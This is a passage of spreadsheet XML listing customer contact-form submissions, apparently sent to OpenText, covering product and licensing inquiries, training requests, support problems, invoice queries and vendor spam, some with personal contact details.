BRInsurance é uma Corretora de Seguros, que está buscando um parceiro disponibilizar plataforma de treinamento e-learning para nossos clientes dos produtos massificados sobre seguros e assistências, para isso necessitamos de materiais de para avaliação e apresentação a nossa diretoria para definição e solicitação de apresentação mais detalhada._x000D_
Gostariamos se possivel que nos encaminhasse o material (institucional, etc) para que possamos tratar o assunto._x000D_
_x000D_
grato,_x000D_
Duvidas favor encaminhar e-mail - edson.santos@brinsurance.com.br</t>
  </si>
  <si>
    <t>Hi,_x000D_
I got approval for this two courses:_x000D_
3-0400 Enterprise Connect Installation, Configuration and Administration v10.5_x000D_
3-0117 OpenText Content Server WebReport Design I v16_x000D_
I would like to take these two courses in a classroom._x000D_
I'm writing from Ottawa (Ontario), Canada._x000D_
I prefer that you write to me by email_x000D_
_x000D_
Thanks,_x000D_
Jarrinson Trujillo G</t>
  </si>
  <si>
    <t>We are interested in Your EDI offer.</t>
  </si>
  <si>
    <t>We're looking for a  hardware/software solution to convert our archive (over 3 milion letter size pages) into a document management system. Please contact me ASAP. Thank you.</t>
  </si>
  <si>
    <t>I need to set up an UPC Catalog.  I have my manufacturing code</t>
  </si>
  <si>
    <t>Decisiv search engine</t>
  </si>
  <si>
    <t>Birt xls generated big file size</t>
  </si>
  <si>
    <t xml:space="preserve">Birt XLS generated big excel file </t>
  </si>
  <si>
    <t>URGENT - Please reply to confirm iban Gb23CITI18500817431963 on invoice SCH08122163._x000D_
Thank you_x000D_
Best regards_x000D_
Karina</t>
  </si>
  <si>
    <t xml:space="preserve">Hi there_x000D_
Interested in LEAP. Need a content management system for training material content (development of). This is currently in word, powerpoint. Want tagging for content so could be retrievable, poss to convert to online, version control etc etc. I would also like to know costs. </t>
  </si>
  <si>
    <t xml:space="preserve">Good morning, _x000D_
_x000D_
We are facing a problem on Easylink portal, we try to send our newsletter with the account of our collegue Marion Sebastianelli _x000D_
(Log : MP/FR/MARION), but we didn't received the "tests emails". _x000D_
It appears on our dashboard at first "cancelled" on the status column and "completed" after few minutes without receving any "test emailing"?_x000D_
_x000D_
Could you please come back to me in order to send our newsletters as soon as possible? _x000D_
_x000D_
Thank you in advance. _x000D_
_x000D_
Best regards, _x000D_
_x000D_
Chloé Dubus_x000D_
</t>
  </si>
  <si>
    <t>I am performing audit on behalf of Lexmark. I am requesting contract for account 085665001. _x000D_
Usage 0.09 per minute_x000D_
Messaging MRC 36.00</t>
  </si>
  <si>
    <t>I need contact details from OpenText who can assist us with quotation on licence renewal. We need to have a direct interaction with OEM for licence renewals and only engage our Service Provider for support.</t>
  </si>
  <si>
    <t>I'm looking for implementing a legacy ERP archiving solution across HVAC Europe.</t>
  </si>
  <si>
    <t>To Whom it may concern, _x000D_
_x000D_
I am looking for possible Training Options and Support of the program language GUPTA._x000D_
_x000D_
Kind regards,_x000D_
Steve Carman</t>
  </si>
  <si>
    <t>Good morning, _x000D_
_x000D_
We have already sent you 3 requests to fill in the document attached._x000D_
Could you please complete this as soon as possible? This is a mandatory procedure in our company._x000D_
_x000D_
We cannot proceed with your payment unless your company data has been confirmed!_x000D_
_x000D_
Kind regards, _x000D_
_x000D_
Karen Decroës</t>
  </si>
  <si>
    <t>BIRT Report "Export Content" Multiple Export Formats (.AFP, .XLSX, .PS, .PPT) are throwing error message while opening a report.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir/ Madam,_x000D_
_x000D_
The Procurement Service Unit (PSU) of the United Nations Development Programme (UNDP) hereby solicits your proposal for the above-mentioned Invitation to Bid (RFP)._x000D_
Bidders are cordially invited to submit a proposal according to the Instructions in the RFP document as described in the referenced URL:  http://procurement-notices.undp.org/view_notice.cfm?notice_id=39439_x000D_
The closing date of the tender is: 21st August 2017_x000D_
_x000D_
Please take note the submission is through UNDP eTendering system. _x000D_
_x000D_
The eTendering manual is available in the given link._x000D_
_x000D_
The event ID (as a reference ID in the eTendering) is EVENT ID: UNDP1 - 0000001477_x000D_
_x000D_
Thank you for your anticipated participation and interest in UNDP._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">view time tried to Raise an SR for the case via support@opentext.com. But not responding </t>
  </si>
  <si>
    <t>We need exsisting customer, dan require us to upgrade thier curent rigthfax server, please help us to provide pricing</t>
  </si>
  <si>
    <t>I would like to explore possible solutions of Fax server solution.</t>
  </si>
  <si>
    <t>I would like to setup a demo asap for your Intranet solution offering. There will be 2 other participants from Velodyne.</t>
  </si>
  <si>
    <t>I’m going to download Trial PixTools from the following site._x000D_
http://documentum.opentext.com/captiva-oem/trial-software/_x000D_
_x000D_
1. What is difference between “PixTools for .NET 8.6” and “PixTools 8.6 (Scan/View/IP)” ?_x000D_
_x000D_
2. Is there an expiration date on each “PixTools for .NET 8.6” and “PixTools 8.6 (Scan/View/IP)” ?_x000D_
_x000D_
3. In the download site of “PixTools 8.6 (Scan/View/IP)”, a SDK license seems to be required. To get it, what should I do?_x000D_
_x000D_
4. In the download site of “PixTools for .NET 8.6”, there is no description about a license. This is not required the license. Is this correct?_x000D_
_x000D_
5. “PixTools for .NET 8.5 Sample Source Code” is not available due to the severed link. How can I available the sample source code?_x000D_
  https://emcinformation.com/67403/REG/.ashx_x000D_
_x000D_
Thank you very much for your help.</t>
  </si>
  <si>
    <t>Interested in iHub deployment for cloud and on-premise deployment (on multiple platforms) for ACI's multiple products</t>
  </si>
  <si>
    <t xml:space="preserve">I have a question for technical support.  I have a question regarding copying content without copying version history.  The users I support frequently move files with extensive histories and wish to only copy the most recent version.  </t>
  </si>
  <si>
    <t>I would like some information about your Analytics license model and the costing structure. We currently use BIRT open source and would like to know what would be required to use the Big Data Analytics for our customer data analytics. I'm based in New Zealand, managing this area for Digitata.</t>
  </si>
  <si>
    <t>Is there a way to find out what time the Capture Center Virtual Class on September 25th starts? It says 4 day duration but what is the time it starts each day?  Thank you   Veronica</t>
  </si>
  <si>
    <t>I work for a  value-add reseller and I need a quote for 13x Opentext Exceed for a NASA customer. Can you provide a quote to resellers? Thanks.</t>
  </si>
  <si>
    <t>Unable to download any material. I complete ALL fields, but ten receive an error message stating that "Information provided is incomplete or invalid.  Industry - this field is required". However there is not an Industry filed provided to complete. Can you please correct and help. Thank You.</t>
  </si>
  <si>
    <t>I am trying to use your Brave reader.  I keeps going into "not responding" mode when I launch it.  When it does run it seems to consume a lot of memory 316,408K at the moment on a 482KB TIF file.</t>
  </si>
  <si>
    <t xml:space="preserve">Request for license keys for Opentext 5.6.2 for two instances (Production and Test environments).  Currently, Resene has a license for Opentext 5.6.1 purchased as part of an Infor M3 installation.  Resene are upgrading their ERP software to a later version of infor's M3  and hence also need to implement a new version of Opentext.  This request is for the license keys associated with that. </t>
  </si>
  <si>
    <t>Pricing on Brava</t>
  </si>
  <si>
    <t>I need to purchase a network license for BRAVA and I cannot pay for it. When I attempt it says to try again later (on your website)</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,  _x000D_
_x000D_
We are hosting an Oracle Application, "Oracle Argus Safety version 8.0.1".  This application integrates with RightFax 10.5 to submit regulatory reports, for this need, to Canada Healthcare.  _x000D_
_x000D_
1) we are not familiar with the Ot RightFax deployment needed for Oracle Argus 8.0.1 - presumably the simplest RighFax Server option._x000D_
_x000D_
2) what information you need for licensing and pricing for our RightFax need._x000D_
_x000D_
I'm not clear what kind of info you would need to help us determine licensing and costs._x000D_
_x000D_
If you can let me know what info we need to provide to determine the potential cost, that would be great.  _x000D_
_x000D_
I can ensure the appropriate infrastructure team can provide the relevant information._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Michael Gallegos_x000D_
Sr Technical Consultant_x000D_
Highpoint Solutions_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Would like to get a call with our team to go over the pricing and the products for taking fax from on prem to the cloud._x000D_
We are currently running a 2 node collective with 48 channels on each node along with a dr with the same setup. </t>
  </si>
  <si>
    <t>Hi, regardind the "Vendor Invoice Management (VIM) Consultant Certification", do you have any particular dates or calendar to take the exam or how can we schedule one? It would be good for us startitng August. Thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">I am interested in learning if you have DOCS Open and DOCS Routing for small businesses.  I used DOCS Open at a previous large firm.  I am now at a small firm that needs a document repository system, but on a much smaller scale.  Please let me know if you have small business services and how pricing works.  _x000D_
_x000D_
Thanks,_x000D_
Jennifer  </t>
  </si>
  <si>
    <t>I would like to have access to documentation to develop features on an existing livelink system in Hydro quebec. I can't request because I don't know my application number</t>
  </si>
  <si>
    <t xml:space="preserve">Boa tarde, tudo certo?_x000D_
Nós da Men’s Market estamos fechando parceria com empresas para presentearem seus funcionários no dia dos pais. _x000D_
Temos diversos kits que contem produtos masculinos que todo homem usa, abrangendo a parte de barbear e de cuidados com o cabelo._x000D_
Você pode conferir um pouco mais sobre a marca e os produtos acessando esse link: https://www.mensmarket.com.br/mens_x000D_
Caso tenham interesse basta enviar um e-mail para vinicius@mensmarket.com.br ou ligar para o telefone (11) 3024-31118._x000D_
Obrigado, aguardaremos o contato.  _x000D_
</t>
  </si>
  <si>
    <t>We are looking for an electronic records management solution. We are a federal government electric utility.</t>
  </si>
  <si>
    <t>Can you please provide a budgetary estimate for OpenText Suite for Oracle in addition to system requirements for onsite solution, what is included, and if possible average setup time and costs.</t>
  </si>
  <si>
    <t>How can I find the presentations from the Open Text Confernece in Toronto? online?  _x000D_
Thanks,_x000D_
Mary Ann</t>
  </si>
  <si>
    <t>Have been proposing Disaster Recovery services to Covisint in Detroit, would like to follow up with Opentext as deal moves forward.</t>
  </si>
  <si>
    <t>We are currently using Formware for data capturing. From my understanding Captiva is now associated with your company. We are looking to upgrade our software to something newer. Do you have anything that would be similar to this?</t>
  </si>
  <si>
    <t>I not recived the activation link in my email i tried some times with "Resend Validation" but not work, can check please?_x000D_
Thanks</t>
  </si>
  <si>
    <t>Is there a way to get the information shared in CEM-222 for those that were not able to attend the conference in Toronto? This was the session on the xPression Roadmap.</t>
  </si>
  <si>
    <t>Information about recostar</t>
  </si>
  <si>
    <t>Would like to know if there is a record of courses taken and certifications.  Over the years I have taken quite a few different courses with Learning Services and less formal training internally at OT and I'd like to find out what I've taken (my memory may not be all that reliable) and possibly get copies of certificates if any are available (I know I had some, unfortunately some were lost and others were emailed to me and expired on the exchange server).</t>
  </si>
  <si>
    <t xml:space="preserve">Good morning, we write to request for your fax broadcast service and we have send several email but hasn't receive any respond we will be glad to hear from you as soon as possible, do furnish us with more details about how this service work and cost of sending faxes within US._x000D_
_x000D_
Greetings,_x000D_
_x000D_
Mr. Stephen Privette_x000D_
Sales Manager_x000D_
Dir: tel: (918)-268-9086_x000D_
fax:      (918)-455-3695_x000D_
www.gavcoplastics.com_x000D_
</t>
  </si>
  <si>
    <t>Looking for 2D and 3D view and mark-up technology</t>
  </si>
  <si>
    <t>_x000D_
Dear,_x000D_
_x000D_
We are software selling company from Poland. We have 25 years experience in selling computer software on polish market._x000D_
 _x000D_
One of our customer (Bank BGŻ BNP Paribas S.A.) is interesting in purchase order on: _x000D_
_x000D_
OpenText MBPM - 50 named users + OpenText MBPM - Maintenance_x000D_
 _x000D_
What will be dealer's price and how can I buy for him?_x000D_
 _x000D_
Best Regards_x000D_
Adam Mekal</t>
  </si>
  <si>
    <t>Hello,_x000D_
I am not able to access the support portal.  Can you please advise to the issue?_x000D_
Thanks_x000D_
Ross</t>
  </si>
  <si>
    <t>I wish to take the 1-0107-eL Using Content Server v16 on line course.  Once the course has been completed, is it possible to take it over again in order to ensure nothing has been missed.  Please let me know.  Thanks in advance.</t>
  </si>
  <si>
    <t>We are a COTS software provider in the government human services space, with US states being our primary clients. We did a POC with Exstream with HP and would like to update ourselves on the product for possible inclusion in a pending bid. Time is of the essence, as we are preparing our response right now. Could someone contact me ASAP? Our questions are largely technical, but I can provide context. Thanks.</t>
  </si>
  <si>
    <t>Sehr geehrt Damen und Herren,_x000D_
_x000D_
Sie haben mich in einer Mail und einem Brief als Zulieferer erwähnt. Ich weiß aber nicht, warum ich ein Zulieferer sein sollte. Ich weiß momentan nicht einmal, woher Sie meine Daten haben._x000D_
Ich bitte hierbei um Aufklärung._x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
Marvin Berger</t>
  </si>
  <si>
    <t>I would like to give a new user access to folders, sub folders and documents.  Access has been granted individually at the top level not using a group.  Is it possible to assign the new user access to all the folders, sub folders and documents without having to go into the profile of each of these?</t>
  </si>
  <si>
    <t>I would like to learn more about your content suite platform, it ability to integrate with SharePoint, and its capability for handling Adobe FrameMaker book files (.book).</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
Are you looking Salesforce Customers for your general campaign, implementation, integration and training across Globe?_x000D_
_x000D_
Here is a chance, we have recently updated and confirmed the list companies that use “Salesforce CRM”._x000D_
_x000D_
Looking for something else? _x000D_
_x000D_
Please let me know your target criteria or requirement for more details and if this is something you don’t deal with within your company, kindly guide me._x000D_
_x000D_
Warm Regards,_x000D_
Amy Jackson_x000D_
</t>
  </si>
  <si>
    <t>We are sourcing a supplier for our client initially for managed billing (all channels), but potentially for a review of all CCM communications. I need to determine if Opentext can provide the necessary services and also if they are interested in engaging in discussions with our client potentially.</t>
  </si>
  <si>
    <t>Opentext Exstream training (online) and Demo lisence._x000D_
This is my 4th email. Please respond._x000D_
Ayan</t>
  </si>
  <si>
    <t>We would like to send an RFI to your company and need to know the correct contact.  Thanks</t>
  </si>
  <si>
    <t>I work with HCL Technologies. We have been a Documentum Engineering and System Integration Partner since 2001. I have been asked to explore additional Partnership opportunities. Can someone get back to me at the earliest? Thank you! Dan</t>
  </si>
  <si>
    <t>Do you have a version of BRAVA reader free of change that can be used with Windows 7? Thanks in advance. Kind regards, Karin Bangert</t>
  </si>
  <si>
    <t>Was looking at BIRT iHUB F-Type but this has been replaced by a trial of OpenText HUB - however I cannot find your pricing structure for licenses. Please advise of cost to implement on server.</t>
  </si>
  <si>
    <t>Hi_x000D_
We are in the process of paying your invoice no. SUK08157105 dated 30 June 2017. However, we note the bank account details quoted on your invoice are different to the details stored in our systems. Before we pay your invoice please can you confirm your correct bank account details._x000D_
Please note invoices cannot be paid until we have confirmation of your correct bank details._x000D_
Many thanks_x000D_
Shirley Harrison</t>
  </si>
  <si>
    <t>I have a project based on Angular 2.x as front end &amp; Laravel PHP for backend. How can I use "BIRT Reports" as my reporting engine within such architecture?</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I am the Deliver Manager for Regulatory Reporting at Commerzbank AG. As part of an ongoing software development project we are required to extend Birt to produce reports in AFP format. For your website I see maybe you provide a product that can assist with this. _x000D_
_x000D_
Would someone be available for a meeting or call where we could discuss our requirements?</t>
  </si>
  <si>
    <t>To know whether your software is Freeware or licence product. And where we will get it's implementation details and integration in SAP Hybris. Thank you.</t>
  </si>
  <si>
    <t>Greetings from J-K Network Services! We can provide multilinguals like Japanese,Korean,Mandarin, Thai, French,Spanish, Indonesian, Malaysian and other Asian and European languages. _x000D_
Please visit our website,http://jkmanpower.jp-network-e.com/_x000D_
Email us at business@jp-network-e.com._x000D_
M: 0917 813 9678</t>
  </si>
  <si>
    <t>Quote_x000D_
Valve assembly_x000D_
Part number Y-40-D180429_x000D_
For a daewoo forklift ( D40SC-2 )_x000D_
Quantity : 3_x000D_
_x000D_
Thank you _x000D_
Wassim Hasan</t>
  </si>
  <si>
    <t>i am interst to work with open text company.</t>
  </si>
  <si>
    <t>I'm interested to know about Opentext Lotus Notes Composer Solution</t>
  </si>
  <si>
    <t>Dear Opentext,_x000D_
_x000D_
We are currently working on an opportunity to replace a Xmedius FAX Enterprise Fax Server. We would like to push for your solution._x000D_
_x000D_
this is the current setup:_x000D_
Xmedius FAX Enterprise_x000D_
Fax Server_x000D_
- Unlimited users                    _x000D_
- support up to 20 sites per server_x000D_
- does not include channel licenses_x000D_
XMediusFAX T.38  Channel License: 8_x000D_
XMediusFAX Microsoft - Exchange Connector_x000D_
- support MS Exchange 1_x000D_
- includes XMFAX Custom forms for MS Outlook_x000D_
- license is for one email server_x000D_
_x000D_
Thanks for your feedback_x000D_
_x000D_
Hugo LE GUERN</t>
  </si>
  <si>
    <t>Company Name: Airport Limo Leads_x000D_
Name: Kimberly Taylor_x000D_
Title: Remote Live Answering Service Call Center Manager_x000D_
Email: remoteliveansweringservice@outlook.com_x000D_
Subject: Try out Remote Live Answering Services. Never miss an important call again! No more long hold times!_x000D_
Your Message: Please contact us today at 1-405-418-6160 and ask for Kimberly regarding "Remote Live Answering Services". For more details visit www.airportlimoleads.com and click on Answering Services today to join now!_x000D_
Telephone: 1-405-418-6160_x000D_
Location: PO BOX 1321 Oklahoma City, OK 73113</t>
  </si>
  <si>
    <t>Would like to know how has Exstream changed while it's transition from one owner to another. Also it would be great if i can have a overview guide of New OT Exstream Overview guide or booklet by OpenText. I have been working on Dialogue for more than 3 years and would like to explore while it has been acquired by OpenText from HP._x000D_
Best Regards.</t>
  </si>
  <si>
    <t xml:space="preserve">Want to apply in DATA ANALYTICS </t>
  </si>
  <si>
    <t>Hi,_x000D_
we are not able to see the updates on ticket, please provide us access to view the update on support ticket.</t>
  </si>
  <si>
    <t>i want join you.</t>
  </si>
  <si>
    <t>Soi I can be food at clash of clans</t>
  </si>
  <si>
    <t>So I can be good at clash of clans_x000D_
_x000D_
W</t>
  </si>
  <si>
    <t>DXC Technology is the largest independent end-to-end IT Services company with world with $25B in revenue, ~170K employees and ~6000 customers.  We are a result of a recent merger between HP Enterprise and CSC._x000D_
_x000D_
I run the DXC Digital Business Platforms Consulting practice for the Americas region.  I’d like to explore a Go-to-Market and/or strategic relationship.</t>
  </si>
  <si>
    <t>I would like to invite a member of your executive team with a guest to join us in our VIP area on Thursday August 10th at Victoria Park where we will present The Sheepdogs at our Launch Concert for the 2017 TD Kitchener Blues Festival. This is the premiere cultural event in the Region, and I would be delighted if you could join us.</t>
  </si>
  <si>
    <t>Dear Open Text:_x000D_
_x000D_
My name is Cope Thomas and I love your great work in law &amp; ai. I've developed an algorithm that reads &amp; extracts 'significant' issues currently trained on non-disclosure or confidentiality agreements. Therefore dramatically reducing reading time and focusing on the pertinent issues.  In other words, you don't have to reread the same standard no-risk provisions over and over again. This algorithm is easily applied to all forms of contracts. I'm beginning the second phase of beta testing and seeking testers. Please check out an attempt at automated NDA analysis at http://contractreader.us/ . _x000D_
_x000D_
Any input is greatly appreciated!_x000D_
_x000D_
Sincerely,_x000D_
Cope Thomas_x000D_
(518) 817-9652_x000D_
http://contractreader.us/</t>
  </si>
  <si>
    <t>I am looking to check my school e-mail.</t>
  </si>
  <si>
    <t>know more about the BI product. Is is hosted on your side or can we host it in our servers?  How does it differ if we just use Birt directly?</t>
  </si>
  <si>
    <t>i don't know how to update my magellan gps</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I am reaching out to check whether you have any need of database of ICT professionals mentioned below:_x000D_
_x000D_
Service Providers, Consulting/ Contractor/ EF&amp;I Firm, Cable Operator/ MSO, Data Center Operator, Cloud Hosting, Utility, Government/Municipality, Military, Education Institution, Research Firm, Industry _x000D_
_x000D_
Partner/ Association, Manufacturer/Distributor, Sourcing/Purchasing etc._x000D_
_x000D_
Kindly let me know your requirements and will get back to you with details such as counts, and pricing etc._x000D_
_x000D_
Look forward to your response._x000D_
_x000D_
Regards,_x000D_
Ethan Morris | Marketing Manager</t>
  </si>
  <si>
    <t>Hi, _x000D_
_x000D_
I want to know if you sell the license of centura team developer 2000 and how much cost that. _x000D_
_x000D_
Thanls</t>
  </si>
  <si>
    <t>I am requesting access to the Learning Central</t>
  </si>
  <si>
    <t>information on the old Alchemy product and options for upgrading to your current solution</t>
  </si>
  <si>
    <t>Gain access to knowledge base</t>
  </si>
  <si>
    <t>I am a contractor for the US Department of Defense. My team is responsible for supporting specific DoD agencies in going digital. Currently, the agency receives approximately 20000 applications a year. About half of those come in on paper. Many of those are handwritten. Cursive is an option. An application includes both structured and unstructured documents. We would like to capture data from the application form and identify metadata on document type for many of the application attachments. Is this something OpenText Capture Center could handle?</t>
  </si>
  <si>
    <t>I am with OCG Telecom, federal reseller company. I would like to get in contact with your federal sales representative for the Federal Trade Commission Office. To inquire a special pricing quote for a large order request:_x000D_
(Quantity 210)_x000D_
Annual Open Text Exceed Software Maintenance_x000D_
MAINT-EXMPI550700M_x000D_
License # V092652-000_x000D_
Period of Performance 09/01/2017-08/31/2018_x000D_
Base + 4 Option Years_x000D_
RFQ 66297</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I am reaching out to check whether you have any need of Embedded Systems professionals mentioned below:_x000D_
_x000D_
Design Development Engineer (Software or Hardware), Business Manager, Embedded Systems Engineer, Executive/Corporate Manager, Design/Development Engineering Manager (Software or Hardware) etc._x000D_
_x000D_
Kindly let me know your requirements and will get back to you with details such as counts, and pricing etc._x000D_
_x000D_
Look forward to your response._x000D_
_x000D_
Regards,_x000D_
Kevin Daniels | Marketing Manager_x000D_
Sublime Data Inc._x000D_
kevin@sublimedata.us_x000D_
www.sublimedata.us</t>
  </si>
  <si>
    <t>Project for SouthAmerican country. Government entity looking for what MediaBin I believe can provide. Need some more concrete workflow before the end of next week. Might need to travel._x000D_
You can call me at my cell: 516.884.9882_x000D_
Christian Dam</t>
  </si>
  <si>
    <t>Looking for documentation or examples for 16.2 REST API</t>
  </si>
  <si>
    <t xml:space="preserve">We received a letter from your company and would like to know more information about it. the subject title is: Important Announcement from OpenText. Please give us a call at 805-568-2100. Thank you very much for your time! _x000D_
 </t>
  </si>
  <si>
    <t>I'm trying to click on the links ont his page: http://www.opentext.ca/what-we-do/services/training-and-learning-services/opentext-certification to see what is required for each certification, and I'm getting error page.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello OpenText_x000D_
_x000D_
We work closely with companies from multiple industries and offer the full package when it comes to audiovisual/technical translations, we offer:_x000D_
•	Subtitling_x000D_
•	Dubbing_x000D_
•	Voice-over_x000D_
•	Content creation_x000D_
•	audio descriptions_x000D_
_x000D_
We work with several language pairs, and have developed a strict and thorough quality control process guaranteed by our team’s solid linguistics skills._x000D_
_x000D_
Best regards, _x000D_
_x000D_
Vânia Quintaneiro _x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hardworking, Driven student seeking an internship in IT in the Rochester NY area. Not willing to relocate. Can send resume on request. </t>
  </si>
  <si>
    <t xml:space="preserve">I need a link to download my purchased product on a new computer. </t>
  </si>
  <si>
    <t xml:space="preserve">I can't believe a 2billons dollar company can't have an easy way to contact them... we have been trying very hard to make business with you but it hasn't been easy at all._x000D_
We have a customer that is using documentum 7.3 and we really like to help them by installing a trial/demo locally, everything we have found in the internet is related to EMC, but that doesn't help at all, Ive called them but they don't have idea about 7.3... I beg you pardon if tone of this message is a little bit rude but I'm desperate to find what we are looking for._x000D_
thanks for your attention and I'm really looking forward to hear from you._x000D_
</t>
  </si>
  <si>
    <t>Dumping the file tree/structure in OpenText Enterprise Connect</t>
  </si>
  <si>
    <t>Due to a server crash we had to restore the teleform server to a new VM but unfortunately the Teleform License Service will no longer start. The error message it shows is:_x000D_
_x000D_
"The Teleform License Service service on Local Computer started and then stopped." _x000D_
_x000D_
Looking into the application log on the server it shows the following _x000D_
_x000D_
"Error:  WNetAddConnection2.  The network path was not found._x000D_
(V10.6 10644) [TFService.cpp  1366]"_x000D_
_x000D_
and_x000D_
_x000D_
"Error:  The machine identification in the installed Activation Code does not match this system.  Please use the License Manager to determine your License Configuration_x000D_
(V10.6 10644) [tfauthen.cpp  1499]"_x000D_
_x000D_
We are using Teleform v10.6 and no where in the License Manager software will it allow me to determine the configuration._x000D_
_x000D_
Any help would be greatly appreciated as we can no longer use the system until this is resolved and there is no documentation anywhere to help resolve this._x000D_
_x000D_
Thanks_x000D_
Keith</t>
  </si>
  <si>
    <t xml:space="preserve">TESTING FORM </t>
  </si>
  <si>
    <t>Questions about implementing RightFax in the USICE enterprise.  What is the licensing model?  What backend encryption is supported (128-bit AES or 256-bit AES)?  Support for multiple regions, CONUS and OCONUS?</t>
  </si>
  <si>
    <t>Trying to create an account so as to download your appworks documentation but not final e-mail link sent and will not let me create the account under e-mail address.</t>
  </si>
  <si>
    <t>We are a health care solutions company and have a number of clients interested in an embedded FAX solution.  We would like to be able to develop interfaces and recommend OpenText as the solution for them.  I need someone to contact me regarding any OpenText Developers programs, evaluation/development versions, etc. so we can make our final decision as to who we will partner with for a Fax solution and integration.  Thank you.</t>
  </si>
  <si>
    <t>Hello, we are happy with your product but very dissatisfied with one of your resellers that provide support to ApplicationXtender for us. I have a few questions that I hope someone can answer.  The approximately $12,000 a year tier 1 maintenance agreement that we pay, is that an agreement with OpenText or just the local vendor?  That agreement includes free ApplicationXtender upgrades.  What other vendors are in the region of north central Indiana?  We are a tax exempt, non-profit organization and also wondering if there is a reseller that offers special non-profit pricing?  Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Hiring Manager,_x000D_
I am interested in working with your company for the above desired post as a Fresher. I am looking forward to work with you. _x000D_
Kindly find the attachment. _x000D_
Thanks &amp; Regards, _x000D_
Akram Reza hashmi </t>
  </si>
  <si>
    <t>Dear Sir or Madam,_x000D_
_x000D_
we are IT company from Czech republic. There is a possibility that one of our customers will want to buy Qty 159 licenses LiveLink/Content Server. Are you OK with reselling or are you doing direct sales only?_x000D_
_x000D_
Thank you._x000D_
_x000D_
Juraj Mrazik</t>
  </si>
  <si>
    <t xml:space="preserve">Good day, we write to request for your fax broadcasting service, be kind to tell us more about this service the cost and more needful information about the service, i shall be waiting to hear from you as soon as possible._x000D_
_x000D_
Greetings,_x000D_
_x000D_
Mr. Stephen Privette_x000D_
Sales Manager_x000D_
Dir: tel: (918)-268-9086_x000D_
fax:      (918)-455-3695_x000D_
www.gavcoplastics.com_x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
Regarding invoices SSFI00002388 and SSFI0002405.We need to know the name of you contact person in Fujitsu Finland for these invoices or we are not able to send them on to our approval process.Brgds,_x000D_
Siiri Ilustrum/AP Specialist</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Dear Opentext,_x000D_
_x000D_
We are in the process of reviewing the profiles on Lex Connect with a view to carrying out a market study around September/October of this year._x000D_
_x000D_
We would like to invite you to revisit your profile by 31st July latest and ensure it is update so you can be best represented in our report._x000D_
_x000D_
If you have any questions - or you've forgotten your login details - feel free to reach out to me and I can help set up the account._x000D_
_x000D_
Have a nice day._x000D_
_x000D_
Kind regards,_x000D_
_x000D_
The Lex Connect Team_x000D_
lexconnect@yerrasolutions.com_x000D_
Lex Connect by Yerra Solutions_x000D_
</t>
  </si>
  <si>
    <t>Information on licensing terms_x000D_
_x000D_
Dear Sir or Madam,_x000D_
_x000D_
For your product Gupta (Report Builder) we need some information concerning our license management._x000D_
I would be delighted if you could briefly comment on the following questions:_x000D_
_x000D_
1. What is the latest version of your product?_x000D_
2. Do you distribute various editions of this product (standard / professional or similar)?_x000D_
3. How can the software be provided (download, data carriers, etc.)?_x000D_
4. Which license metrics do you see for your current version (named user, client, floating etc.)?_x000D_
5. Is a license key required to activate the software?_x000D_
6. Is there a downgrade option for older versions and are these versions still be available?_x000D_
7. Is there a secondary usage right (and if so, what conditions, for example, PC and mobile device)?_x000D_
_x000D_
Thank you for your statement._x000D_
If you have any questions, please do not hesitate to contact me._x000D_
_x000D_
Best regards,_x000D_
Juliane</t>
  </si>
  <si>
    <t>Hi,_x000D_
please let me know, if the course 4-1501 is still available and how many seats are currently free._x000D_
Additionally I need to know, when the next date for course 4-1521 is planned.  _x000D_
Thanks,_x000D_
Michael</t>
  </si>
  <si>
    <t xml:space="preserve">The finalization of the creation of the Support account does not work. I have got an Invitation for creating an account. I have created the account for the user "Henning.Lohmann@innogy.com" and also I have also defined a Passwort. But unfortunately the link in the email, which I have got for conferming the account, does not work. Here the link:_x000D_
http://loginqa.opentext.com/connect/sso_controller-main?sys_action=verifyaccount&amp;VerifyEmail=2nltd%2bFadqzHmOQJx8DvyQd3%2bk5qrLfONAsnthGX304%3d&amp;cams_original_url=_x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
Until recently a customer of us had the free DWG-Viewer in the employment._x000D_
Could you please offer me a quotation about the successor of the Free DWG viewer?_x000D_
Please explain the order process. Is a payment on account 10 days in Euro possible?_x000D_
_x000D_
Best Regards,_x000D_
Laura Soberski</t>
  </si>
  <si>
    <t>I am interested to evaluate your SAP archiving solution to cater one of our SAP decommission requirement._x000D_
_x000D_
Please contact ASAP</t>
  </si>
  <si>
    <t xml:space="preserve">Seeking For Any Job </t>
  </si>
  <si>
    <t xml:space="preserve">Please see my request for support upgrade.  Fellow colleague is Aaron Tait.  Our Account Manager is bradloff@opentext.com_x000D_
Here are our contracts :_x000D_
Content Server	OpenText Protect Anytime	1/07/2017 0:00	30/06/2018 0:00	RC177255   	https://ePay.opentext.com/RR-R-USD-SUS08459665_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Could you please put me in email contact with your Marketing and Promotions Manager._x000D_
We have a rare brand partnering opportunity with RYAN GREGSON, one of Australia's most exciting athletes and Olympic 1500m finalist that we would like to discuss with you._x000D_
_x000D_
Regards _x000D_
Susan Gregson _x000D_
Marketing and Administration_x000D_
Little King Enterprises Pty Ltd_x000D_
</t>
  </si>
  <si>
    <t>Hi Sir/Mdm, CTC Global is trying to bid for an open tender published by the Singapore government for an Enterprise Content Management suite in replacement of their current system. We would like to find out more to see if we can collaborate and bid in together. Closing date is end of August and hence if possible, we would like a meet up with your local team. Thanks.</t>
  </si>
  <si>
    <t>TMX is exploring AI prototypes to see how the new technology can improve core business models and explore new ones.</t>
  </si>
  <si>
    <t>Hello!_x000D_
_x000D_
I am reaching out to see whether you have any need of key decision makers from every sector of the utility industry mentioned below:_x000D_
_x000D_
